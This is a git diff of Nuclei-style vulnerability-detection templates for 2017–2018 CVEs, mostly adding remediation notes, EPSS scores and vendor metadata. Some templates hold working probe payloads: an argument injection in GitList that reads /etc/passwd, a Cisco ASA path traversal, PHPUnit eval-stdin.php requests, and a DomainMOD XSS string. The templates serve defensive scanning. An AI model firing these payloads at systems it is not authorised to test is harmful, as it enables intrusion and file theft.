- http://packetstormsecurity.com/files/157080/DotNetNuke-Cookie-Deserialization-Remote-Code-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2017-9822 cwe-id: CWE-20 + epss-score: 0.96098 + epss-percentile: 0.99316 cpe: cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:* - epss-score: 0.97311 - tags: cve,cve2017,dotnetnuke,bypass,rce,deserialization,kev metadata: max-request: 1 + vendor: dnnsoftware + product: dotnetnuke + tags: packetstorm,cve,cve2017,dotnetnuke,bypass,rce,deserialization,kev http: - raw: @@ -33,14 +38,14 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '[extensions]' - 'for 16-bit app support' - part: body condition: and - type: status status: - 404 -# Enhanced by mp on 2022/04/26 +# digest: 4a0a004730450220163500188bead25d6973bad92af6f9cd38e4a2c5eae9c3017e0827f452855ae7022100926ba991082c503349c24178be19c60e30c752f90a4b67716b9d20e53a5765aa:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-9833.yaml b/http/cves/2017/CVE-2017-9833.yaml index 3b8e4cc83d..a17250c76c 100644 --- a/http/cves/2017/CVE-2017-9833.yaml +++ b/http/cves/2017/CVE-2017-9833.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: BOA Web Server 0.94.14 is susceptible to arbitrary file access. The server allows the injection of "../.." using the FILECAMERA variable sent by GET to read files with root privileges and without using access credentials. + remediation: | + Upgrade to a patched version of BOA Web Server or apply the necessary security patches. reference: - https://www.exploit-db.com/exploits/42290 - https://nvd.nist.gov/vuln/detail/CVE-2017-9833 @@ -15,11 +17,14 @@ info: cvss-score: 7.5 cve-id: CVE-2017-9833 cwe-id: CWE-22 - cpe: cpe:2.3:a:boa:boa:*:*:*:*:*:*:*:* - epss-score: 0.90626 - tags: boa,lfr,lfi,cve,cve2017,edb + epss-score: 0.35156 + epss-percentile: 0.96648 + cpe: cpe:2.3:a:boa:boa:0.94.14.21:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: boa + product: boa + tags: boa,lfr,lfi,cve,cve2017,edb http: - method: GET @@ -36,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/12 +# digest: 4b0a0048304602210091861b198ca4d7f50d643f0b0d16bba1560a373b59d5844d9ee760ffa8eae205022100edb5e026c7f00ab9656e0d19d55aa2570eebcc812e3791bacf8c25a146b57ca0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-9841.yaml b/http/cves/2017/CVE-2017-9841.yaml index f5fd61dbc9..5f0be1ff8f 100644 --- a/http/cves/2017/CVE-2017-9841.yaml +++ b/http/cves/2017/CVE-2017-9841.yaml @@ -5,6 +5,8 @@ info: author: Random_Robbie,pikpikcu severity: critical description: PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a " - - | GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} Content-Type: text/html - - | GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} Content-Type: text/html - - | GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} Content-Type: text/html - - | GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} Content-Type: text/html - - | GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} @@ -69,12 +69,12 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "6dd70f16549456495373a337e6708865" - part: body - type: status status: - 200 -# Enhanced by mp on 2022/05/12 +# digest: 4a0a004730450221008b906a849d65142768588af417df59d33dfd98e7e6362ae3a473dd8db69dbb940220095aa42620777b4016e60583b1eb228a4517862d0d180b7bfa6de6699bee0e34:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-0127.yaml b/http/cves/2018/CVE-2018-0127.yaml index 20cf63be67..19b18adf39 100644 --- a/http/cves/2018/CVE-2018-0127.yaml +++ b/http/cves/2018/CVE-2018-0127.yaml @@ -5,20 +5,26 @@ info: author: jrolf severity: critical description: Cisco RV132W ADSL2+ Wireless-N VPN Routers and Cisco RV134W VDSL2 Wireless-AC VPN Routers could allow an unauthenticated, remote attacker to view configuration parameters for an affected device via the web interface, which could lead to the disclosure of confidential information. + remediation: | + Apply the latest firmware update provided by Cisco to fix the vulnerability. reference: - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180207-rv13x_2 - http://web.archive.org/web/20211207054802/https://securitytracker.com/id/1040345 - - http://web.archive.org/web/20210226170218/https://www.securityfocus.com/bid/102969 - https://nvd.nist.gov/vuln/detail/CVE-2018-0127 + - http://www.securitytracker.com/id/1040345 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-0127 - cwe-id: CWE-306 - epss-score: 0.13216 - tags: cve,cve2018,cisco,router + cwe-id: CWE-306,CWE-200 + epss-score: 0.09982 + epss-percentile: 0.9423 + cpe: cpe:2.3:o:cisco:rv132w_firmware:1.0.0.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: "cisco" + product: rv132w_firmware + tags: cve,cve2018,cisco,router http: - method: GET @@ -27,17 +33,17 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body - condition: and words: - "Dump" - "MDM" - "cisco" - "admin" + condition: and -# Enhanced by mp on 2022/05/12 + - type: status + status: + - 200 + +# digest: 490a0046304402201e560854e3534ca384af7afd69273188f6e9d2e3f9bb2e631d76c66c0f8010cb02203b4bbe990a3a655fb6418e675e2573cbf23891cc3345c3ca8b5ac3c8f045cf6a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-0296.yaml b/http/cves/2018/CVE-2018-0296.yaml index 780954402b..14e8497163 100644 --- a/http/cves/2018/CVE-2018-0296.yaml +++ b/http/cves/2018/CVE-2018-0296.yaml @@ -6,25 +6,33 @@ info: severity: high description: | Cisco Adaptive Security Appliances (ASA) web interfaces could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. It is also possible on certain software releases that the ASA will not reload, but an attacker could view sensitive system information without authentication by using directory traversal techniques. The vulnerability is due to lack of proper input validation of the HTTP URL. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. An exploit could allow the attacker to cause a DoS condition or unauthenticated disclosure of information. This vulnerability applies to IPv4 and IPv6 HTTP traffic. This vulnerability affects Cisco ASA Software and Cisco Firepower Threat Defense (FTD) Software that is running on the following Cisco products: 3000 Series Industrial Security Appliance (ISA), ASA 1000V Cloud Firewall, ASA 5500 Series Adaptive Security Appliances, ASA 5500-X Series Next-Generation Firewalls, ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers, Adaptive Security Virtual Appliance (ASAv), Firepower 2100 Series Security Appliance, Firepower 4100 Series Security Appliance, Firepower 9300 ASA Security Module, FTD Virtual (FTDv). Cisco Bug IDs: CSCvi16029. + remediation: | + Apply the necessary security patches or updates provided by Cisco to fix the local file inclusion vulnerability. reference: - https://github.com/yassineaboukir/CVE-2018-0296 - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180606-asaftd - https://www.exploit-db.com/exploits/44956/ - https://nvd.nist.gov/vuln/detail/CVE-2018-0296 + - http://www.securitytracker.com/id/1041076 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 cve-id: CVE-2018-0296 - cwe-id: CWE-22 - epss-score: 0.97492 - tags: edb,cve,cve2018,cisco,lfi,traversal,asa,kev + cwe-id: CWE-22,CWE-20 + epss-score: 0.97359 + epss-percentile: 0.99864 + cpe: cpe:2.3:a:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cisco + product: adaptive_security_appliance_software + tags: edb,cve,cve2018,cisco,lfi,traversal,asa,kev http: - method: GET path: - "{{BaseURL}}/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" + headers: Accept-Encoding: deflate @@ -39,4 +47,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/19 +# digest: 4a0a00473045022033a9e4f93ba0264b4422d9af12a1aec06ea50510239614d646960ef5c50031db022100b7fd1a73ed7ede9b3b08e8b69a7f126099c85d67de45dbb10c4a4c071908f0a2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-1000129.yaml b/http/cves/2018/CVE-2018-1000129.yaml index acec68f593..dd6606a2ab 100644 --- a/http/cves/2018/CVE-2018-1000129.yaml +++ b/http/cves/2018/CVE-2018-1000129.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Jolokia 1.3.7 is vulnerable to cross-site scripting in the HTTP servlet and allows an attacker to execute malicious JavaScript in the victim's browser. + remediation: | + Upgrade to a patched version of Jolokia or apply the necessary security patches to mitigate the XSS vulnerability. reference: - https://jolokia.org/#Security_fixes_with_1.5.0 - https://github.com/rhuss/jolokia/commit/5895d5c137c335e6b473e9dcb9baf748851bbc5f#diff-f19898247eddb55de6400489bff748ad @@ -17,9 +19,14 @@ info: cvss-score: 6.1 cve-id: CVE-2018-1000129 cwe-id: CWE-79 - tags: cve,cve2018,jolokia,xss + epss-score: 0.00232 + epss-percentile: 0.61156 + cpe: cpe:2.3:a:jolokia:jolokia:1.3.7:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: jolokia + product: jolokia + tags: cve,cve2018,jolokia,xss http: - method: GET @@ -28,9 +35,9 @@ http: - "{{BaseURL}}/jolokia/read?mimeType=text/html" stop-at-first-match: true + matchers-condition: and matchers: - - type: word part: body words: @@ -48,4 +55,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/18 +# digest: 4a0a00473045022100aa1f8d563dcd825e5a9681331414121984d2cc4b30d59739a23c1d6799d884380220583befa2022dcadda2cf65a1758a74ee8d2732f7accf6c7a22423f95d144a390:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-1000130.yaml b/http/cves/2018/CVE-2018-1000130.yaml index 875b6212cb..db6f154bdc 100644 --- a/http/cves/2018/CVE-2018-1000130.yaml +++ b/http/cves/2018/CVE-2018-1000130.yaml @@ -5,7 +5,9 @@ info: author: milo2012 severity: high description: | - Jolokia agent is vulnerable to a JNDI injection vulnerability that allows a remote attacker to run arbitrary Java code on the server when the agent is in proxy mode. + Jolokia agent is vulnerable to a JNDI injection vulnerability that allows a remote attacker to run arbitrary Java code on the server when the agent is in proxy mode. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the vulnerability. reference: - https://jolokia.org/#Security_fixes_with_1.5.0 - https://access.redhat.com/errata/RHSA-2018:2669 @@ -15,9 +17,14 @@ info: cvss-score: 8.1 cve-id: CVE-2018-1000130 cwe-id: CWE-74 - tags: cve,cve2018,jolokia,rce,jndi,proxy + epss-score: 0.89191 + epss-percentile: 0.98397 + cpe: cpe:2.3:a:jolokia:webarchive_agent:1.3.7:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: jolokia + product: webarchive_agent + tags: cve,cve2018,jolokia,rce,jndi,proxy http: - raw: @@ -46,4 +53,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/19 +# digest: 4b0a00483046022100f4733481e96af4030595e0d91ae425588905b11aa0e1a80d2a5c6dcdd82d27cb022100f9742f365ebd603ac94ef39eec2dbf1b0c14bf506e98e671554fc4c6b6a4309e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-1000226.yaml b/http/cves/2018/CVE-2018-1000226.yaml index d8623f2870..8eda2a42c1 100644 --- a/http/cves/2018/CVE-2018-1000226.yaml +++ b/http/cves/2018/CVE-2018-1000226.yaml @@ -5,6 +5,8 @@ info: author: c-sh0 severity: critical description: Cobbler versions 2.6.11+, but code inspection suggests at least 2.0.0+ and possibly even older versions, may be vulnerable to an authentication bypass vulnerability in XMLRPC API (/cobbler_api) that can result in privilege escalation, data manipulation or exfiltration, and LDAP credential harvesting. This attack appear to be exploitable via "network connectivity". Taking advantage of improper validation of security tokens in API endpoints. Please note this is a different issue than CVE-2018-10931. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the authentication bypass vulnerability in Cobbler. reference: - https://github.com/cobbler/cobbler/issues/1916 - https://movermeyer.com/2018-08-02-privilege-escalation-exploits-in-cobblers-api/ @@ -14,9 +16,14 @@ info: cvss-score: 9.8 cve-id: CVE-2018-1000226 cwe-id: CWE-732 - tags: cve,cve2018,cobbler,auth-bypass + epss-score: 0.01552 + epss-percentile: 0.85744 + cpe: cpe:2.3:a:cobblerd:cobbler:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cobblerd + product: cobbler + tags: cve,cve2018,cobbler,auth-bypass http: - raw: @@ -39,9 +46,9 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 + - type: dsl + dsl: + - "!contains(tolower(body), 'faultCode')" - type: word part: header @@ -53,13 +60,13 @@ http: words: - "" - - type: dsl - dsl: - - "!contains(tolower(body), 'faultCode')" - - type: regex part: body regex: - "(.*[a-zA-Z0-9].+==)    " -# Enhanced by mp on 2022/05/12 + - type: status + status: + - 200 + +# digest: 490a004630440220491e47d127fec0c8860d6748c31dee6b6f3b5691221b3070bb5a317ae6c19fc7022037590d74d8f89e9d684f4f9bb73d760f105c19801b0a24145d9e8d1fcb32dbb9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-1000533.yaml b/http/cves/2018/CVE-2018-1000533.yaml index d91512d205..7a60019b1a 100644 --- a/http/cves/2018/CVE-2018-1000533.yaml +++ b/http/cves/2018/CVE-2018-1000533.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: klaussilveira GitList version <= 0.6 contains a passing incorrectly sanitized input via the `searchTree` function that can result in remote code execution. + remediation: | + Upgrade GitList to version 0.6.0 or later to mitigate this vulnerability. reference: - https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533 - https://nvd.nist.gov/vuln/detail/CVE-2018-1000533 @@ -15,18 +17,20 @@ info: cvss-score: 9.8 cve-id: CVE-2018-1000533 cwe-id: CWE-20 + epss-score: 0.97207 + epss-percentile: 0.99758 cpe: cpe:2.3:a:gitlist:gitlist:*:*:*:*:*:*:*:* - epss-score: 0.97249 - tags: git,cve,cve2018,gitlist,vulhub,rce metadata: max-request: 2 + vendor: gitlist + product: gitlist + tags: git,cve,cve2018,gitlist,vulhub,rce http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - - | POST /{{path}}/tree/a/search HTTP/1.1 Host: {{Hostname}} @@ -34,19 +38,19 @@ http: query=--open-files-in-pager=cat%20/etc/passwd + matchers: + - type: word + part: body + words: + - "root:/root:/bin/bash" + extractors: - type: regex name: path group: 1 - internal: true - part: body regex: - '(.*?)' - - matchers: - - type: word - words: - - "root:/root:/bin/bash" + internal: true part: body -# Enhanced by mp on 2022/04/08 +# digest: 4a0a00473045022100c91705f38fa9002d54526426fb085e10cca92d0811927b11263d33528f15dbf4022053a9c2f753409a8c0b7d0be9ea73327c91aef69e5b9164b946d435a6d0cc1d64:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-1000600.yaml b/http/cves/2018/CVE-2018-1000600.yaml index 1d81baecd1..f5d9de870c 100644 --- a/http/cves/2018/CVE-2018-1000600.yaml +++ b/http/cves/2018/CVE-2018-1000600.yaml @@ -5,7 +5,9 @@ info: author: geeknik severity: high description: | - Jenkins GitHub Plugin 1.29.1 and earlier is susceptible to server-side request forgery via GitHubTokenCredentialsCreator.java, which allows attackers to leverage attacker-specified credentials IDs obtained through another method and capture the credentials stored in Jenkins. + Jenkins GitHub Plugin 1.29.1 and earlier is susceptible to server-side request forgery via GitHubTokenCredentialsCreator.java, which allows attackers to leverage attacker-specified credentials IDs obtained through another method and capture the credentials stored in Jenkins. + remediation: | + Upgrade Jenkins GitHub Plugin to version 1.29.2 or later to mitigate the vulnerability. reference: - https://www.jenkins.io/security/advisory/2018-06-25/#SECURITY-915 - https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/ @@ -16,9 +18,15 @@ info: cvss-score: 8.8 cve-id: CVE-2018-1000600 cwe-id: CWE-200 - tags: cve,cve2018,jenkins,ssrf,oast,github + epss-score: 0.95579 + epss-percentile: 0.99192 + cpe: cpe:2.3:a:jenkins:github:*:*:*:*:*:jenkins:*:* metadata: max-request: 1 + vendor: jenkins + product: github + framework: jenkins + tags: cve,cve2018,jenkins,ssrf,oast,github http: - method: GET @@ -31,4 +39,4 @@ http: words: - "http" -# Enhanced by mp on 2022/06/19 +# digest: 4b0a00483046022100f755ab58c427f3deecfb29cf761ce80b3377c644b368e3f0ea89b0c18fe3b9120221009929ad0e133e992667c661bfe03e920ba3d64a24e61b2ca54124a47018b57d7f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-1000671.yaml b/http/cves/2018/CVE-2018-1000671.yaml index f47b246cae..23947e3436 100644 --- a/http/cves/2018/CVE-2018-1000671.yaml +++ b/http/cves/2018/CVE-2018-1000671.yaml @@ -5,19 +5,28 @@ info: author: 0x_Akoko severity: medium description: Sympa version 6.2.16 and later contains a URL Redirection to Untrusted Site vulnerability in the referer parameter of the wwsympa fcgi login action that can result in open redirection and reflected cross-site scripting via data URIs. + remediation: | + Upgrade to a patched version of Sympa (>=6.2.17) or apply the necessary security patches provided by the vendor. reference: - https://github.com/sympa-community/sympa/issues/268 - https://vuldb.com/?id.123670 - https://nvd.nist.gov/vuln/detail/CVE-2018-1000671 + - https://lists.debian.org/debian-lts-announce/2018/09/msg00023.html + - https://lists.debian.org/debian-lts-announce/2020/11/msg00015.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-1000671 cwe-id: CWE-601 + epss-score: 0.00745 + epss-percentile: 0.78836 + cpe: cpe:2.3:a:sympa:sympa:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"sympa" verified: true + max-request: 1 + vendor: sympa + product: sympa + shodan-query: http.html:"sympa" tags: cve,cve2018,redirect,sympa,debian http: @@ -31,4 +40,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# Enhanced by mp on 2022/08/18 +# digest: 4b0a004830460221009cbb6fa204d9fab2bef81dadecb2387ffe16c3cdb7022a733227266827122487022100a622e2ca224113c4a1c826f56a908b2ae368bef42b6331a80d1a3fec064445b1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-1000856.yaml b/http/cves/2018/CVE-2018-1000856.yaml index 3ef3fee5a2..8d44c050fb 100644 --- a/http/cves/2018/CVE-2018-1000856.yaml +++ b/http/cves/2018/CVE-2018-1000856.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD 4.11.01 is vulnerable to cross-site scripting via the segments/add.php Segment Name field. + remediation: | + Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://github.com/domainmod/domainmod/issues/80 - https://nvd.nist.gov/vuln/detail/CVE-2018-1000856 @@ -14,14 +16,18 @@ info: cvss-score: 4.8 cve-id: CVE-2018-1000856 cwe-id: CWE-79 + epss-score: 0.00101 + epss-percentile: 0.41184 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true + max-request: 3 + vendor: domainmod + product: domainmod tags: cve,cve2018,domainmod,xss,authenticated http: - raw: - - | POST / HTTP/1.1 Host: {{Hostname}} @@ -34,7 +40,6 @@ http: Content-Type: application/x-www-form-urlencoded new_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&raw_domain_list=test.com&new_description=test&new_notes=test - - | GET /segments/ HTTP/1.1 Host: {{Hostname}} @@ -43,6 +48,7 @@ http: cookie-reuse: true host-redirects: true max-redirects: 3 + matchers-condition: and matchers: - type: word @@ -59,4 +65,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/18 +# digest: 4a0a0047304502205c18ddf95ffc551f8af0be9664fc6f8875a7c449745f58ddcffbaf448dcdf01f022100c4dc7e1799c0670cabfe7b11b9cfae7ef553f354e9c417249cbe2e9d31e539fd:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-1000861.yaml b/http/cves/2018/CVE-2018-1000861.yaml index 58c9a0dac4..d3b9b9cc26 100644 --- a/http/cves/2018/CVE-2018-1000861.yaml +++ b/http/cves/2018/CVE-2018-1000861.yaml @@ -5,20 +5,27 @@ info: author: dhiyaneshDK,pikpikcu severity: critical description: Jenkins 2.153 and earlier and LTS 2.138.3 and earlier are susceptible to a remote command injection via stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way. + remediation: | + Apply the latest security patches and updates provided by Jenkins to mitigate this vulnerability. reference: - https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861 - https://nvd.nist.gov/vuln/detail/CVE-2018-1000861 - https://jenkins.io/security/advisory/2018-12-05/#SECURITY-595 - - http://web.archive.org/web/20210421212616/https://www.securityfocus.com/bid/106176 + - http://packetstormsecurity.com/files/166778/Jenkins-Remote-Code-Execution.html + - https://access.redhat.com/errata/RHBA-2019:0024 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-1000861 cwe-id: CWE-502 - epss-score: 0.97348 - tags: kev,vulhub,cve,cve2018,rce,jenkins + epss-score: 0.97145 + epss-percentile: 0.99723 + cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* metadata: max-request: 1 + vendor: jenkins + product: jenkins + tags: packetstorm,kev,vulhub,cve,cve2018,rce,jenkins http: - method: GET @@ -27,14 +34,13 @@ http: matchers-condition: and matchers: - - type: word + part: body words: - "package#vulntest" - part: body - type: status status: - 200 -# Enhanced by mp on 2022/05/12 +# digest: 490a004630440220567d3e5b8ec6e7e4e0cfb409aa8dfe3642b88f6e2a2ea4c32f476ed37224147b022049dc142019181b1e030f7b4b63c4bc44e0c3825d4fd43c98b54cadebbc353bbd:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-10093.yaml b/http/cves/2018/CVE-2018-10093.yaml index ae7850cca6..dcd0e7da20 100644 --- a/http/cves/2018/CVE-2018-10093.yaml +++ b/http/cves/2018/CVE-2018-10093.yaml @@ -6,6 +6,8 @@ info: severity: high description: | AudioCodes IP phone 420HD devices using firmware version 2.2.12.126 allow remote code execution. + remediation: | + Apply the latest firmware update provided by AudioCodes to fix the vulnerability and ensure proper input validation. reference: - https://www.exploit-db.com/exploits/46164 - https://nvd.nist.gov/vuln/detail/CVE-2018-10093 @@ -16,9 +18,14 @@ info: cvss-score: 8.8 cve-id: CVE-2018-10093 cwe-id: CWE-862 - tags: cve,cve2018,rce,iot,audiocode,edb,seclists + epss-score: 0.06287 + epss-percentile: 0.92811 + cpe: cpe:2.3:o:audiocodes:420hd_ip_phone_firmware:2.2.12.126:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: audiocodes + product: 420hd_ip_phone_firmware + tags: cve,cve2018,rce,iot,audiocode,edb,seclists http: - method: GET @@ -27,7 +34,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "admin:.*:*sh$" @@ -36,4 +42,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/19 +# digest: 4a0a00473045022003e1398e0168b606f2a0c217a993c414ea4fa8f3e2dbdaa62579252d694220e90221009cd941f1958974d26f730eeb1683daeaca11361a0bc54fbb569e7b8b1cb0a5e5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-10095.yaml b/http/cves/2018/CVE-2018-10095.yaml index a48cedb578..e260bb656f 100644 --- a/http/cves/2018/CVE-2018-10095.yaml +++ b/http/cves/2018/CVE-2018-10095.yaml @@ -6,19 +6,27 @@ info: severity: medium description: | Dolibarr before 7.0.2 is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via the foruserlogin parameter to adherents/cartes/carte.php. + remediation: | + Upgrade to Dolibarr version 7.0.2 or later to mitigate this vulnerability. reference: - https://sysdream.com/news/lab/2018-05-21-cve-2018-10095-dolibarr-xss-injection-vulnerability/ - https://github.com/Dolibarr/dolibarr/commit/1dc466e1fb687cfe647de4af891720419823ed56 - https://github.com/Dolibarr/dolibarr/blob/7.0.2/ChangeLog - https://nvd.nist.gov/vuln/detail/CVE-2018-10095 + - http://www.openwall.com/lists/oss-security/2018/05/21/3 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-10095 cwe-id: CWE-79 - tags: cve,cve2018,xss,dolibarr + epss-score: 0.95296 + epss-percentile: 0.99121 + cpe: cpe:2.3:a:dolibarr:dolibarr:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: dolibarr + product: dolibarr + tags: cve,cve2018,xss,dolibarr http: - method: GET @@ -28,17 +36,17 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - - - type: status - status: - - 200 - type: word part: header words: - text/html -# Enhanced by mp on 2022/08/18 + - type: status + status: + - 200 + +# digest: 490a0046304402205d57361a8bf517e95b69934ae158d572875a51d7493fc703dcaffb5f035bda8602207943f6f3b061cc5ee2544a04f399900361038e818fffdc5deb168ba7de34c7fa:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-10141.yaml b/http/cves/2018/CVE-2018-10141.yaml index e4abee668d..7521d404f5 100644 --- a/http/cves/2018/CVE-2018-10141.yaml +++ b/http/cves/2018/CVE-2018-10141.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: Palo Alto Networks PAN-OS before 8.1.4 GlobalProtect Portal Login page allows an unauthenticated attacker to inject arbitrary JavaScript or HTML, making it vulnerable to cross-site scripting. + remediation: | + Upgrade to Palo Alto Networks PAN-OS GlobalProtect VPN client version 8.1.4 or later to mitigate this vulnerability. reference: - https://security.paloaltonetworks.com/CVE-2018-10141 - https://nvd.nist.gov/vuln/detail/CVE-2018-10141 @@ -13,9 +15,14 @@ info: cvss-score: 6.1 cve-id: CVE-2018-10141 cwe-id: CWE-79 - tags: cve,cve2018,panos,vpn,globalprotect,xss + epss-score: 0.00126 + epss-percentile: 0.46935 + cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: paloaltonetworks + product: pan-os + tags: cve,cve2018,panos,vpn,globalprotect,xss http: - method: GET @@ -38,4 +45,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/18 +# digest: 4b0a00483046022100c937c2880ebeb8ab4a8b49c5a6b6a4c346fa91f83860b6fd21e6986c45342e81022100ae9e53a1ec279ec4afa68fd13bd0711ed8bf5397c3822ed02a60bb66cae3027c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-10201.yaml b/http/cves/2018/CVE-2018-10201.yaml index 8ea50f6028..c6f006f4be 100644 --- a/http/cves/2018/CVE-2018-10201.yaml +++ b/http/cves/2018/CVE-2018-10201.yaml @@ -5,19 +5,27 @@ info: author: 0x_akoko severity: high description: Ncomputing vSpace Pro versions 10 and 11 suffer from a directory traversal vulnerability. + remediation: | + Apply the latest security patches or updates provided by Ncomputing to fix the directory traversal vulnerability. reference: - https://packetstormsecurity.com/files/147303/Ncomputing-vSPace-Pro-10-11-Directory-Traversal.html - https://nvd.nist.gov/vuln/detail/CVE-2018-10201 - http://www.kwell.net/kwell_blog/?p=5199 - https://www.kwell.net/kwell/index.php?option=com_newsfeeds&view=newsfeed&id=15&Itemid=173&lang=es + - https://support.ncomputing.com/portal/kb/articles/ncomputing-health-monitor-server-vulnerability-patch classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-10201 cwe-id: CWE-22 - tags: cve2018,ncomputing,lfi,packetstorm,cve + epss-score: 0.04525 + epss-percentile: 0.91543 + cpe: cpe:2.3:a:ncomputing:vspace_pro:10:*:*:*:*:*:*:* metadata: max-request: 4 + vendor: ncomputing + product: vspace_pro + tags: cve2018,ncomputing,lfi,packetstorm,cve http: - method: GET @@ -37,4 +45,4 @@ http: - "extensions" condition: and -# Enhanced by mp on 2022/04/26 +# digest: 4a0a00473045022100c6a57ee91c3b30a5d1dc4104b6f368867d1e75eddc27d90d0ccc137e347cec230220646102a87472a6dded6b7a99e0dde2972e8873f4b5798820027234663cc41e58:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-10230.yaml b/http/cves/2018/CVE-2018-10230.yaml index 4a0b5e0a7d..c820019d9a 100644 --- a/http/cves/2018/CVE-2018-10230.yaml +++ b/http/cves/2018/CVE-2018-10230.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Zend Server before version 9.13 is vulnerable to cross-site scripting via the debug_host parameter. + remediation: | + Upgrade Zend Server to version 9.13 or later to mitigate this vulnerability. 